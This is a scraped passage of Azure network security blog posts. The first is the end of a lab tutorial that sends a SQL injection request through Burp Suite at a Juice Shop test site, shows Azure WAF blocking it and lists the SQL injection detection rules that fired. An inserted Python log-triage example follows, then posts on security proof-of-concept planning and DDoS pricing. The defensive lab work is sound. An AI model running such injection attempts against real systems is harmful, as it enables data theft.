<LI>On Kali VM, launch a new instance of Burp Suite and the Firefox browser</LI> <LI>Using Firefox, browse to <A href="#" target="_blank" rel="noopener">http://juiceshopthruazwaf.com</A> and check the <STRONG>Proxy --&gt; HTTP history</STRONG> tab for the request and response data for this website in Burp Suite</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609804974511.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244144i834C8E07CBA7AB6F/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609804974511.png" alt="Mohit_Kumar_0-1609804974511.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>Search for "apple" in the search bar, find the request to the vulnerable <STRONG>/rest/products/search </STRONG>endpoint and send it to the Burp Repeater</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Send Request to Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609805057439.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244145i2B47FB312848CC0F/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609805057439.png" alt="Mohit_Kumar_0-1609805057439.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Request in Burp Repeater</STRONG></FONT></P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609805081885.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244147iB3C58AA5E92A2D6E/image-size/large?v=v2&amp;px=999" role="button" 
title="Mohit_Kumar_2-1609805081885.png" alt="Mohit_Kumar_2-1609805081885.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <OL start="4"> <LI>Append the encoded SQL query (from Step 10 in Scenario 1 above) as value to the query parameter in the Burp Repeater and click <STRONG>Go (or Send)</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_3-1609805127593.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244148i1A13B29B67792A58/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_3-1609805127593.png" alt="Mohit_Kumar_3-1609805127593.png" /></span></P> <P>&nbsp;</P> <OL start="5"> <LI>Upon examining the response, we find that the request was blocked by Azure WAF on Application Gateway</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_4-1609805146293.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244149iACCF7C506B1E7679/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_4-1609805146293.png" alt="Mohit_Kumar_4-1609805146293.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Understanding What Happened</H2> <P>&nbsp;</P> <P>Upon reviewing the HTTP requests and responses for the two attempts to perform SQL Injection in the same instance of the Juice Shop application, we see the pattern as shown in the below table.&nbsp; This clearly indicates that the potentially malicious payload which could otherwise be stored in the application is not allowed through by Azure WAF.</P> <P>&nbsp;</P> <TABLE border="1" width="99.86187845303866%"> <TBODY> <TR> <TD width="66.85082872928176%" height="30px"> <P><STRONG>SQL Injection Route</STRONG></P> </TD> <TD width="33.011049723756905%" height="30px" 
class="lia-align-center"> <P><STRONG>Success</STRONG></P> </TD> </TR> <TR> <TD width="66.85082872928176%" height="30px"> <P>Direct</P> </TD> <TD width="33.011049723756905%" height="30px" class="lia-align-center"> <P>Yes</P> </TD> </TR> <TR> <TD width="66.85082872928176%" height="30px"> <P>Through WAF</P> </TD> <TD width="33.011049723756905%" height="30px" class="lia-align-center"> <P>No</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>Now let us use the <A title="Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Azure Monitor Workbook for WAF</A> to understand how the WAF handled traffic with the <STRONG>SQL Injection </STRONG>query.&nbsp; This workbook visualizes security relevant WAF events across several filterable panels.&nbsp; <EM>It works with all WAF types, including Application Gateway, Front Door, and CDN, and can be filtered based on WAF type or a specific WAF instance.</EM></P> <P>&nbsp;</P> <P><A title="Deploy Azure Monitor Workbook for WAF" href="#" target="_blank" rel="noopener">Click here</A> to deploy <STRONG>Azure Monitor Workbook for WAF</STRONG> to your subscription in Azure.</P> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; To understand what is happening when traffic with SQL Injection query destined for the Juice Shop application goes through the Azure WAF, you can also examine the log entries associated with <STRONG>ApplicationGatewayFirewallLog</STRONG> in the <STRONG>Azure Monitor</STRONG></FONT></LI> </UL> <P>&nbsp;</P> <P>&nbsp;</P> <H3><FONT size="3">Reviewing WAF logs in the Workbook</FONT></H3> <P>&nbsp;</P> <OL> <LI>You can access the WAF workbook by going into the Workbook blade and then selecting the WAF workbook deployed for this testing.&nbsp; Once in the workbook, ensure that you have selected the appropriate <STRONG>Time Range</STRONG>, <STRONG>WAF Type and WAF Items</STRONG></LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span 
class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_0-1609805295194.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244150i21F0E088684C7454/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_0-1609805295194.png" alt="Mohit_Kumar_0-1609805295194.png" /></span></P> <P>&nbsp;</P> <OL start="2"> <LI>You should also ensure that you have selected the correct Public IP address for your attacker machine (Kali VM) in the <STRONG>Top 10 Attacking IP Addresses, filter to single IP address </STRONG>pane</LI> </OL> <P>&nbsp;</P> <UL class="lia-list-style-type-square"> <LI><FONT size="2"><STRONG>Tip</STRONG>:&nbsp; If you are using the Azure WAF Attack Testing Lab Environment Deployment Template and have followed the lab setup instructions then the client IP address will be the public IP address of the Azure Firewall in your demo environment</FONT></LI> </UL> <P>&nbsp;</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_1-1609897377934.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244450i211CF3D97BF55518/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_1-1609897377934.png" alt="Mohit_Kumar_1-1609897377934.png" /></span></P> <P>&nbsp;</P> <OL start="3"> <LI>After selecting the correct client IP, we scroll back up to the top of the Workbook and review the visualizations at the top, in the WAF Workbook.&nbsp; Below are the sections of the workbook we will be using as numbered in the below figure</LI> </OL> <P>&nbsp;</P> <P class="lia-indent-padding-left-60px">a. WAF actions filter</P> <P class="lia-indent-padding-left-60px">b. Top 40 Blocked Request URI addresses, filter to single URI address</P> <P class="lia-indent-padding-left-60px">c. 
Top 50 event trigger, filter by rule name</P> <P class="lia-indent-padding-left-60px">d. Message, full details</P> <P class="lia-indent-padding-left-60px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><SPAN><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Mohit_Kumar_2-1609897428966.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/244451iD3C422533E7D955E/image-size/large?v=v2&amp;px=999" role="button" title="Mohit_Kumar_2-1609897428966.png" alt="Mohit_Kumar_2-1609897428966.png" /></span></SPAN></P> <P class="lia-indent-padding-left-30px"><FONT size="2"><STRONG>Note</STRONG>:<STRONG>&nbsp; </STRONG>For a detailed overview of these sections of the WAF workbook, please refer to the<STRONG> Overview of the Workbook Sections</STRONG> in the prior tutorial, <SPAN><A title="Reconnaissance Playbook" href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-2-reconnaissance-playbook-azure-waf-security-protection-and/ba-p/2030751" target="_self">Reconnaissance Playbook</A></SPAN></FONT></P> <P>&nbsp;</P> <OL start="4"> <LI>From the sliced data in the WAF workbook, we can see that two requests to the <STRONG>/rest/products/search</STRONG> URI were blocked by WAF.&nbsp; Upon reviewing the <STRONG>Top 50 event trigger, filter by rule name </STRONG>section, we see all the rules which evaluated the POC code in the request.&nbsp; The <STRONG>Message, full details </STRONG>section shows that the traffic was blocked by the Mandatory rule because the Anomaly Score threshold was exceeded (<STRONG>Total Score: 43, SQLi=43</STRONG>), with SQL Injection attack being the closest match</LI> <LI>The below table shows an extract of the <STRONG>Top 50 event trigger, filter by rule name </STRONG>output for scanner traffic.&nbsp; This data shows that the WAF evaluated the encoded query in the HTTP request to detect that it was a SQL injection attack and therefore blocked it</LI> </OL> <P>&nbsp;</P> <TABLE> 
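</TABLE> <P>How the Total Score of 43 from step 4 can be reconciled with the nine rule hits in the table that follows, and how the same logic flags requests whose log trail does not match the block decision. This is an added Python example, not part of the original tutorial or of Azure's tooling: the log records are constructed, and the per-rule severities (critical = 5, warning = 3) and the threshold of 5 are assumed OWASP CRS defaults.</P>

```python
import re
from collections import defaultdict

CRITICAL, WARNING = 5, 3   # assumed OWASP CRS anomaly weights per severity
THRESHOLD = 5              # assumed inbound anomaly score threshold

# Rule messages as listed in the tutorial's table. The severity given to each
# one is this example's assumption; the workbook output does not show it.
RULE_WEIGHTS = {
    "SQL Injection Attack Detected via libinjection": CRITICAL,
    "Detects MSSQL code execution and information gathering attempts": CRITICAL,
    "Looking for basic sql injection. "
    "Common attack string for mysql, oracle and others.": CRITICAL,
    "Detects MySQL comment-/space-obfuscated injections "
    "and backtick termination": CRITICAL,
    "Detects basic SQL authentication bypass attempts 2/3": CRITICAL,
    "Detects classic SQL injection probings 1/3": CRITICAL,
    "Detects classic SQL injection probings 2/3": CRITICAL,
    "SQL Injection Attack": CRITICAL,
    "Restricted SQL Character Anomaly Detection (args): "
    "# of special characters exceeded (12)": WARNING,
}
SCORE_RE = re.compile(r"Total Score: (\d+)")


def constructed_records():
    """Constructed entries, reduced to the ApplicationGatewayFirewallLog
    properties this example reads. The client IP is a documentation address."""
    def rec(txn, action, message):
        return {"transactionId": txn, "clientIp": "203.0.113.10",
                "hostname": "juiceshopthruazwaf.com",
                "requestUri": "/rest/products/search",
                "action": action, "message": message}

    records = [rec("txn-1", "Matched", m) for m in RULE_WEIGHTS]
    records.append(rec("txn-1", "Blocked",
                       "Mandatory rule. Inbound Anomaly Score Exceeded "
                       "(Total Score: 43, SQLi=43)"))
    # A request that trips only the special-character rule stays under the
    # threshold and is not blocked.
    records.append(rec("txn-2", "Matched", list(RULE_WEIGHTS)[-1]))
    return records


def triage(records, threshold=THRESHOLD):
    """Group entries per request and reconcile rule hits with the outcome."""
    by_txn = defaultdict(list)
    for r in records:
        by_txn[r["transactionId"]].append(r)

    report = {}
    for txn, entries in by_txn.items():
        hits = [e["message"] for e in entries if e["action"] == "Matched"]
        blocks = [e for e in entries if e["action"] == "Blocked"]
        computed = sum(RULE_WEIGHTS.get(m, 0) for m in hits)
        reported = None
        for b in blocks:
            found = SCORE_RE.search(b["message"])
            if found:
                reported = int(found.group(1))
        report[txn] = {
            "uri": entries[0]["requestUri"],
            "client": entries[0]["clientIp"],
            "rule_hits": len(hits),
            "unscored": [m for m in hits if m not in RULE_WEIGHTS],
            "computed_score": computed,
            "reported_score": reported,
            "blocked": bool(blocks),
            # Review when the trail disagrees with the scoring model: over the
            # threshold but not blocked (for example a policy left in
            # Detection mode), or a reported total that differs from the sum.
            "needs_review": ((computed >= threshold) != bool(blocks))
                            or (reported is not None and reported != computed),
        }
    return report


if __name__ == "__main__":
    for txn, row in triage(constructed_records()).items():
        print(txn, row)
```

<TABLE> 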
<TBODY> <TR> <TD width="550"> <P><STRONG>Rule</STRONG></P> </TD> <TD width="60"> <P><STRONG>count_</STRONG></P> </TD> </TR> <TR> <TD width="550"> <P>SQL Injection Attack Detected via libinjection</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects MSSQL code execution and information gathering attempts</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Looking for basic sql injection. Common attack string for mysql, oracle and others.</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects MySQL comment-/space-obfuscated injections and backtick termination</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects basic SQL authentication bypass attempts 2/3</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects classic SQL injection probings 1/3</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>Detects classic SQL injection probings 2/3</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="550"> <P>SQL Injection Attack</P> </TD> <TD width="53"> <P>1</P> </TD> </TR> <TR> <TD width="551"> <P>Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)</P> </TD> <TD width="51"> <P>1</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P>&nbsp;</P> <H2>Key Takeaway</H2> <P>&nbsp;</P> <P>SQL Injection (SQLi) is one of the most common types of application security vulnerability.&nbsp; It allows an external adversary to exploit a vulnerable application to disclose and exfiltrate sensitive information in the application.</P> <P>&nbsp;</P> <P><STRONG>For web applications secured with it, Azure WAF can protect against SQL Injection (SQLi) attacks by detecting and blocking suspicious SQL queries at the network edge, with its out-of-the-box ruleset.</STRONG></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <H4>Previous:&nbsp;<A title="Vulnerability Exploitation Playbook" 
href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-3-vulnerability-exploitation-playbook-azure-waf-security/ba-p/2031047" target="_blank" rel="noopener">Vulnerability Exploitation Playbook</A></H4> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Thu, 11 Feb 2021 21:27:16 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/part-4-data-disclosure-and-exfiltration-playbook-azure-waf/ba-p/2031269 Mohit_Kumar 2021-02-11T21:27:16Z Azure Network Security Proof of Concept Part 1: Planning https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-1-planning/ba-p/1746368 <H3>&nbsp;</H3> <H3><FONT color="#000000"><STRONG>Overview</STRONG></FONT></H3> <P>Planning a network security Proof of Concept (<EM>POC) </EM>in your Azure environment is an effective way to understand the risk and potential exposure of a conceptual network design and how the services and tools available in Azure may be used for improvement. This is the first part of a series of steps to check in validating your conceptual design scenarios.</P> <P>&nbsp;</P> <P>At the end of this article, you will be able to put a process map on your POC, know the type of resources required and have an idea of the implementation strategy to use. Keep it simple.</P> <P>&nbsp;</P> <P>Azure network security involves mandatory and continuous improvement processes for workload protection. The effort to improve the network security posture of every client is a combination of both the Azure team and the customer-<A href="#" target="_blank" rel="noopener">shared responsibility in the cloud</A>. For more information, see the Azure <A href="#" target="_blank" rel="noopener">network&nbsp; security controls documentation</A>.</P> <P>Azure resources also have a <A href="#" target="_blank" rel="noopener">30-day trial access</A> that may be used to validate security with a POC. 
This is useful to note when making budgetary commitments.</P> <P>&nbsp;</P> <P>&nbsp;</P> <H2><FONT color="#000000"><STRONG>Scope</STRONG></FONT></H2> <P>&nbsp;</P> <P>In this article, we discuss the <A href="#" target="_blank" rel="noopener">steps you should consider</A> when performing a security POC (Network, Container, Apps) to meet regulatory and compliance standards.</P> <P>&nbsp;</P> <P>When testing any tool, it will be necessary to determine what capabilities are expected, to achieve a good result. To get started, here are some scenarios that could benefit from layers of network security.</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="securityoptions.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/224283i440E5DAE2B056C56/image-size/large?v=v2&amp;px=999" role="button" title="securityoptions.png" alt="securityoptions.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">The different standards that guide the resources used by your service offerings such as NIST SP 800-53 R4, SWIFT CSP CSCF-v2020 and CIS, and how they align with <A href="#" target="_blank" rel="noopener">compliance</A>, should also be considered as you go along in the exercise.</P> <P class="lia-indent-padding-left-30px">Take advantage of <A href="#" target="_blank" rel="noopener">Azure Security Benchmark</A> to establish guardrails for your security configurations.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000">Understand your network</FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">As the network administrator/manager, having an adequate understanding of the layout of your network 
provides insight into the security requirements. The requirements for the different scenarios may be considered by keeping the focus on the objective of your test:</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Architecture</STRONG></FONT>: Cloud native or hybrid solutions. <A href="#" target="_blank" rel="noopener">More information on Cloud design patterns</A></P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Resources</STRONG></FONT>: Network and Application layer resources. Decide on the <STRONG>focus</STRONG> of your test.</P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Infrastructure</STRONG></FONT>: Storage, Computing etc. <A href="#" target="_blank" rel="noopener">See more on Azure infrastructure</A></P> <P class="lia-indent-padding-left-60px"><FONT color="#333333"><STRONG>Accessibility</STRONG></FONT>: Multi-factor auth, JIT, Role Permissions, RDP/SSH, <A href="#" target="_blank" rel="noopener">Azure Bastion</A> etc.</P> <P class="lia-indent-padding-left-60px"><STRONG><FONT color="#333333">Connectivity services</FONT>:</STRONG> Virtual WAN, ExpressRoute, VPN Gateway, Virtual network NAT Gateway, Azure DNS etc. <A href="#" target="_blank" rel="noopener">More information on Connectivity services</A></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000"><SPAN>Permissions</SPAN></FONT></H2> <P class="lia-indent-padding-left-30px">Access to resources should be role-based when managing user identities. &nbsp;Conditional access should be granted to resources based on device, identity, assurance, network location, and grant temporary access for other connections. 
In addition, use JIT and MFA and follow the principle of <A href="#" target="_blank" rel="noopener">least privilege</A> assignment.</P> <P class="lia-indent-padding-left-510px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="conditional access.png" style="width: 91px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/224285i33045214EBB01D39/image-size/large?v=v2&amp;px=999" role="button" title="conditional access.png" alt="conditional access.png" /></span></P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000">Implementation strategy</FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">It is pertinent to understand which direction your proof of concept should take, such as: how long is the scheduled plan? Is there a dev environment or cluster dedicated to this? What priorities are attached to the application or network infrastructure? A few important guidelines should include:</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Build a </EM></STRONG><A href="#" target="_blank" rel="noopener"><STRONG><EM>security containment strategy</EM></STRONG></A>: Align network segmentation with overall strategy and centralize network management and security. Develop and update the security incident response plan as the network changes.</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Define success index</EM></STRONG>: This is a practical way to measure the work to be done and set the right expectation from the outcome of the process. Are you testing for feasibility, access control or confirming mitigation? How would you define a successful POC?</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Write down</EM></STRONG> the contributors or administrators for each workload/resource for follow-up and task designation. 
It is pertinent to know who is assigned to a <A href="#" target="_blank" rel="noopener">network contributor</A> role or to a <A href="#" target="_blank" rel="noopener">custom role</A> and who has the appropriate actions listed for the <A href="#" target="_blank" rel="noopener">permissions</A>.</P> <P class="lia-indent-padding-left-60px"><STRONG><EM>- Establish a timeline</EM></STRONG> for the requirements that may be discovered during the POC.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000"><EM>Proof of Concept scenarios &nbsp;</EM></FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><FONT color="#333333">Once the guidelines and framework from above have been established, the next step is to map out the scenario. There are different examples of scenarios that may be considered. If unsure, you can look through this article on <A href="#" target="_blank" rel="noopener">Azure network security best practices</A> to see areas that need improvement and then work on a POC to address the problem.</FONT></P> <P class="lia-indent-padding-left-30px"><FONT color="#333333">Other common examples that an administrator/manager may consider for a POC include:</FONT></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">Network segmentation</FONT></H3> <P class="lia-indent-padding-left-60px">The <A href="#" target="_blank" rel="noopener">logical partition</A> of the network is achieved using subnets, subnets peering and virtual networks to define resource accessibility by roles, users, functions, resource types, user-defined routing, location etc. 
Examples include:</P> <P class="lia-indent-padding-left-90px"><EM>- Restrict access within a virtual network by using </EM><A href="#" target="_blank" rel="noopener"><EM>Network Security Groups</EM></A><EM> and Firewall</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Access on-prem and cloud resources and filter internet traffic by creating User-Defined Routes in Azure Firewall</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">Web Application security</FONT></H3> <P class="lia-indent-padding-left-60px">Requests served over HTTP and HTTPS require different components for the appropriate response type. You may be looking to test layer 7 attack validation and mitigation, or to do a post-deployment check.</P> <P class="lia-indent-padding-left-60px">The application may require user-managed or system-managed certificates, protocol support (IPv6 and HTTP/2 traffic), and bot management. An administrator may be looking to validate security-prone issues. Examples of POCs for web application security include:</P> <P class="lia-indent-padding-left-90px"><EM>- Web-App vulnerability protection from SQL injection</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Geo-based access control and rate limiting</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">Ingress and Egress traffic management</FONT></H3> <P class="lia-indent-padding-left-60px">This includes a series of tests around how traffic is managed from one node to the other within and outside the network. Examples of POCs might include remote connectivity, intra-VLAN routing, forced tunneling, geolocation management, content distribution etc. 
Examples of this POC include:</P> <P class="lia-indent-padding-left-90px"><EM>- DNAT access over </EM><EM>RDP to a Windows client</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Bastion connectivity to a virtual network</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Path-Based Routing for resources in a backend pool.</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Secured Virtual Hub to connect virtual WAN resources.</EM></P> <P class="lia-indent-padding-left-30px"><EM>&nbsp;</EM></P> <H3 class="lia-indent-padding-left-60px"><FONT color="#000000">DDoS attack simulation</FONT></H3> <P class="lia-indent-padding-left-60px">Insight into how resources with public-facing interfaces handle DDoS attacks and deny access to legitimate users is a common POC. Validation of your threshold values, how your Azure networking environment responds to volumetric or protocol attacks, and report generation are common areas you may want to review. Examples of this POC include:</P> <P class="lia-indent-padding-left-90px"><EM>- Simulate a DDoS attack through a Microsoft-approved partner.</EM></P> <P class="lia-indent-padding-left-90px"><EM>- Rate limiting access for a specific IP address.</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px">&nbsp;</H2> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000">Monitor the process</FONT></H2> <P class="lia-indent-padding-left-390px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="monitorprocess.png" style="width: 229px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/224287i80C523CF34774EB9/image-dimensions/229x80?v=v2" width="229" height="80" role="button" title="monitorprocess.png" alt="monitorprocess.png" /></span></P> <P class="lia-indent-padding-left-330px">&nbsp;</P> <P class="lia-indent-padding-left-30px">Monitoring the proof of concept 
<FONT color="#000000">behavior</FONT> as you perform the process is essential for aggregating feedback.</P> <P class="lia-indent-padding-left-30px">Log Analytics is the primary tool in the Azure portal for writing log queries and interactively analyzing their results.</P> <P class="lia-indent-padding-left-30px"><A href="#" target="_blank" rel="noopener">NSG flow logs</A> provide information about IP traffic flowing through NSGs. They are vital and <A href="#" target="_blank" rel="noopener">highly <EM>recommended</EM></A> for a better understanding of your network traffic.</P> <P class="lia-indent-padding-left-30px"><BR />Also, confirm that <STRONG>diagnostic logging</STRONG> is enabled for your resource through the Azure portal. Results could take a few minutes to show during a test.</P> <P class="lia-indent-padding-left-30px">Diagnostic logs provide insight into Azure operations that were performed within the data plane of an Azure resource. <A href="#" target="_blank" rel="noopener">Follow this link for more on diagnostics logging</A>.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><A href="#" target="_blank" rel="noopener">Network Performance Monitor</A> is a cloud-based hybrid network monitoring solution that can be used to monitor network performance between various points in your network infrastructure and connectivity to application endpoints. 
<A href="#" target="_blank" rel="noopener">Follow this guideline</A> to set up performance monitoring, Service Connectivity monitoring and Express-route monitoring.</P> <P class="lia-indent-padding-left-30px">For a complete guide on monitoring your network, follow this 5<A href="#" target="_blank" rel="noopener"> minute start video guide</A>.</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <H2 class="lia-indent-padding-left-30px"><FONT color="#000000"><SPAN><STRONG>Conclusion</STRONG></SPAN></FONT></H2> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px">There are many reasons why you may want to do a POC. This series is focused on creating a direction for a network security POC for layer3-4 and layer 7. &nbsp;Once you are clear on what you are testing for (e.g. WAF performance, DDOS mitigation/response or custom rules), proceed to the implementation strategy.</P> <P class="lia-indent-padding-left-30px">In summary, <A href="#" target="_blank" rel="noopener">align your network segmentation</A> model with the enterprise segmentation model for your organization. Delegation models that are well aligned improve automation and make for quick fault isolation. 
A recommended approach for production enterprise is to allow resources to initiate and respond to cloud requests through cloud network security devices.</P> <P class="lia-indent-padding-left-30px"><BR />As a rule, always <A href="#" target="_blank" rel="noopener">adopt a Zero Trust approach</A><SPAN>.</SPAN></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P class="lia-indent-padding-left-30px"><EM>(In the <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-2-deploying-the/ba-p/1773168" target="_self">next</A> part of this series, we build an environment to do a POC, using some of the examples in the Proof of Concept scenarios mentioned in this blogpost. You will be able to follow the steps in the article to do some POC examples)</EM></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> Thu, 11 Feb 2021 21:23:30 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/azure-network-security-proof-of-concept-part-1-planning/ba-p/1746368 tobiotolorin 2021-02-11T21:23:30Z New, Simplified Pricing for Azure DDoS Protection Standard https://gorovian.000webhostapp.com/?exam=t5/azure-network-security/new-simplified-pricing-for-azure-ddos-protection-standard/ba-p/2119336 <P>Changes were made recently to the <A href="#" target="_blank">pricing structure of Azure DDoS Protection Standard</A> which amount to both less cost and more simplicity in understanding and estimating charges. In this post, we will discuss what specifically changed and refresh your understanding of how pricing is calculated.</P> <P>&nbsp;</P> <H2>What Changed?</H2> <P>&nbsp;</P> <P>We removed the data egress charge for DDoS Protection. This charge could be difficult to understand, and even more difficult to estimate across an environment protected by DDoS Protection. 
Even though the data charges only accounted for a small percentage of most customers’ costs, they tended to create an unnecessary hassle for cost management.</P> <P>&nbsp;</P> <P>The old pricing model is pictured below:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_0-1612894532017.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/253664iD663CEFFB6954360/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_0-1612894532017.png" alt="Anthony_Roman_0-1612894532017.png" /></span></P> <P>&nbsp;</P> <P>The new, simpler model follows:</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Anthony_Roman_1-1612894532022.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/253663i99F804F38CA917C8/image-size/large?v=v2&amp;px=999" role="button" title="Anthony_Roman_1-1612894532022.png" alt="Anthony_Roman_1-1612894532022.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <H2>The Components of DDoS Protection Standard</H2> <P>&nbsp;</P> <P>Azure DDoS Protection Standard consists of the following direct and related components, which you should take some time to understand:</P> <UL> <LI>DDoS Protection Plans – This is the primary component of the service. Most customers will only need one plan.</LI> <LI>Tenants – One DDoS Protection Plan can provide protection for an entire tenant. If you have multiple tenants, then you will need multiple plans.</LI> <LI>Subscriptions – Within the same tenant, any number of subscriptions can share the same plan.</LI> <LI>Virtual Networks (VNets) – VNets are the object to which plans are attached. 
